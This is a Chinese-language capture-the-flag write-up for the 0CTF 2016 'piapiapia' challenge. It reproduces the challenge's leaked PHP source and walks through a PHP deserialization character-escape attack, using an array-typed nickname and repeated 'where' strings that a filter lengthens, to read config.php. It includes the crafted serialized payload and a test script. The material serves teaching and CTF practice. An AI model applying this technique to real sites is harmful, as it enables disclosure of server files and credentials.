0CTF-2016-piapiapia(PHP反序列化字符逃逸)
0x01 前言
开学果然是对更新博客没得想法,趁着闲工夫,做了一下这个题,之前XCTF新春赛也出现了PHP反序列化逃逸,不过没做出来。。tcl,直接看题吧。
0x02 正文
这个题直接给你登录页面了,F12没有发现,sql注入也不太像,一般出现登录页面都会有注册页面,字典跑起来,发现有regester.php、config.php、www.zip,居然泄露了www.zip,话不多说下下来直接审计吧。
profile.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
$username = $_SESSION['username'];
$profile=$user->show_profile($username);
if($profile == null) {
header('Location: update.php');
}
else {
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));//-----point------
?>
<!DOCTYPE html>
<html>
<head>
<title>Profile</title>
<link href="static/bootstrap.min.css" rel="stylesheet">
<script src="static/jquery.min.js"></script>
<script src="static/bootstrap.min.js"></script>
</head>
<body>
<div class="container" style="margin-top:100px">
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">
<h3>Hi <?php echo $nickname;?></h3>
<label>Phone: <?php echo $phone;?></label>
<label>Email: <?php echo $email;?></label>
</div>
</body>
</html>
<?php
}
?>
class.php
<?php
require('config.php');
class user extends mysql{
private $table = 'users';
public function is_exists($username) {
$username = parent::filter($username);
$where = "username = '$username'";
return parent::select($this->table, $where);
}
public function register($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$key_list = Array('username', 'password');
$value_list = Array($username, md5($password));
return parent::insert($this->table, $key_list, $value_list);
}
public function login($username, $password) {
$username = parent::filter($username);
$password = parent::filter($password);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
if ($object && $object->password === md5($password)) {
return true;
} else {
return false;
}
}
public function show_profile($username) {
$username = parent::filter($username);
$where = "username = '$username'";
$object = parent::select($this->table, $where);
return $object->profile;
}
public function update_profile($username, $new_profile) {
$username = parent::filter($username);
$new_profile = parent::filter($new_profile);
$where = "username = '$username'";
return parent::update($this->table, 'profile', $new_profile, $where);
}
public function __tostring() {
return __class__;
}
}
class mysql {
private $link = null;
public function connect($config) {
$this->link = mysql_connect(
$config['hostname'],
$config['username'],
$config['password']
);
mysql_select_db($config['database']);
mysql_query("SET sql_mode='strict_all_tables'");
return $this->link;
}
public function select($table, $where, $ret = '*') {
$sql = "SELECT $ret FROM $table WHERE $where";
$result = mysql_query($sql, $this->link);
return mysql_fetch_object($result);
}
public function insert($table, $key_list, $value_list) {
$key = implode(',', $key_list);
$value = '\'' . implode('\',\'', $value_list) . '\'';
$sql = "INSERT INTO $table ($key) VALUES ($value)";
return mysql_query($sql);
}
public function update($table, $key, $value, $where) {
$sql = "UPDATE $table SET $key = '$value' WHERE $where";
return mysql_query($sql);
}
public function filter($string) {
$escape = array('\'', '\\\\');
$escape = '/' . implode('|', $escape) . '/';
$string = preg_replace($escape, '_', $string);
$safe = array('select', 'insert', 'update', 'delete', 'where');
$safe = '/' . implode('|', $safe) . '/i';
return preg_replace($safe, 'hacker', $string);
}
public function __tostring() {
return __class__;
}
}
session_start();
$user = new user();
$user->connect($config);
update.php
<?php
require_once('class.php');
if($_SESSION['username'] == null) {
die('Login First');
}
if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
$username = $_SESSION['username'];
if(!preg_match('/^\d{11}$/', $_POST['phone']))
die('Invalid phone');
if(!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
die('Invalid email');
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
die('Invalid nickname');
$file = $_FILES['photo'];
if($file['size'] < 5 or $file['size'] > 1000000)
die('Photo size error');
move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
$profile['phone'] = $_POST['phone'];
$profile['email'] = $_POST['email'];
$profile['nickname'] = $_POST['nickname'];
$profile['photo'] = 'upload/' . md5($file['name']);
$user->update_profile($username, serialize($profile));
echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
echo serialize($profile);
}
else {
?>
config.php
<?php
$config['hostname'] = '127.0.0.1';
$config['username'] = 'root';
$config['password'] = '';
$config['database'] = '';
$flag = '';
?>
很显然我们能够读取config.php,flag包含在config.php中,seay审计一下,其实人工审计效率更高,只是最近接触到了这么个工具想试试手,发现:
我们观察这句话:
if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname'])||strlen($_POST['nickname']) > 10)
die('Invalid nickname');
如果nickname(可控),传递数组进去,那么preg_match会返回flase,则可以成功绕过。
可以本地运行一下,在查找关键字
file_get_contents
$profile = unserialize($profile);
$phone = $profile['phone'];
$email = $profile['email'];
$nickname = $profile['nickname'];
$photo = base64_encode(file_get_contents($profile['photo']));//-----point------
这时候意图很明显,我们的目的就是将$profile[''photo] = "config.php",这样config.php的内容就能base64出来,而跟进发现其实$profile['photo']是修改不了的:
$profile是怎么得到的呢?继续审计发现:
再来找序列化:
跟进
update_profile会发现:
发现传递进来的
$profile都用了filter方法,跟进filter:
意思就是将
array里的关键字全部替换成hacker,注意的是,我们的字符串是在某变量被反序列化得到的字符串受某函数的所谓过滤处理后得到的,而且经过处理之后,字符串的某一部分会加长,但描述其长度的数字没有改变(该数字由反序列化时变量的属性决定),就有可能导致PHP在按该数字读取相应长度字符串后,本来属于该字符串的内容逃逸出了该字符串的管辖范围。
这样可能不好理解,我们在本地搭建环境,并将$profile反序列化输出(注意这个时候是将nickname修改成了数组):
关键序列化字符:
a:4:{s:5:"phone";s:11:"18888888888";s:5:"email";s:13:"crispr@qq.com";s:8:"nickname";a:1:{i:0;s:6:"%crispr%";}s:5:"photo";s:39:"upload/b371dc3d5de040042a431684b9dd10fc";}`
其中%之内的字符是我们可以控制的字符,我们想要的`$profile['photo']=config.php`经过序列化后会成为:`s:5:"photo";s:10:"config.php`,那我们能不能利用可控内容将其拼接呢?
```php
{s:5:"phone";s:11:"18888888888";s:5:"email";s:13:"crispr@qq.com";s:8:"nickname";a:1:{i:0;s:6:"%crispr%--";}s:5:"photo";s:10:"config.php";}--s:5:"photo";s:39:"upload/b371dc3d5de040042a431684b9dd10fc";}
`
其中`";}s:5:"photo";s:10:"config.php";}`也就是`--`间的字符串是我们拼接的,一共有**34**个字符,此处**能逃逸的字符串**的长度**由经过滤后字符串增加的长度**决定,因为这34个字符是有记录的,`s:`后面接的数字即表示所接字符串的长度,我们只有**将我们拼接的字符串位于这个长度之外**,增长的部分才能正好被PHP解析为一整个变量,因此想到`where`会变成`hacker`,由五个字符变成了六个字符,这样每多一个`where`,我们构造的字符串就能多逃逸一个,这样就需要34个`where`,
我们本地可以进行验证:
我们将得到的序列化反序列化查看,看有没有成功逃逸出来:
```php
<?php
$ser = 'a:4:{s:5:"phone";s:11:"18888888888";s:5:"email";s:13:"crispr@qq.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/b371dc3d5de040042a431684b9dd10fc";}';
$obj = unserialize($ser);
print_r($obj);
?>
成功得到:
此时反序列化后
$profile['photo'] ==config.php,因此我们这样就得到了base64编码的config.php,解码得到flag。